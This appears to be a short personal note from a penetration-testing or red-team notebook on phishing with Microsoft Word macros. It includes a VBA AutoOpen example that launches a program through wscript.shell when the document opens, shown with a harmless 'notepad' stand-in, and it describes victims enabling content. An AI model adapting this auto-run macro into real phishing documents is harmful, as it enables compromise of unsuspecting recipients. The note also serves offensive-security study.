Secondary Categories: 02 - Social Engineering - 02 - Payloads Links: Email Phishing Search Tag:πŸ“•

Microsoft Macros


Description:

To Add/Edit Macro go to View→Macros then create a new macro name

Make sure that the Macros are saved in the word document:

Once the victim clicks β€œEnable Content” then the document macros are always trusted.

Example

Sub AutoOpen()
 
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run "notepad"
 
End Sub

Resources:

TitleURL
placeholder

Created Date: November 6th 2022 12:28
Last Modified Date: November 6th 2022 12:28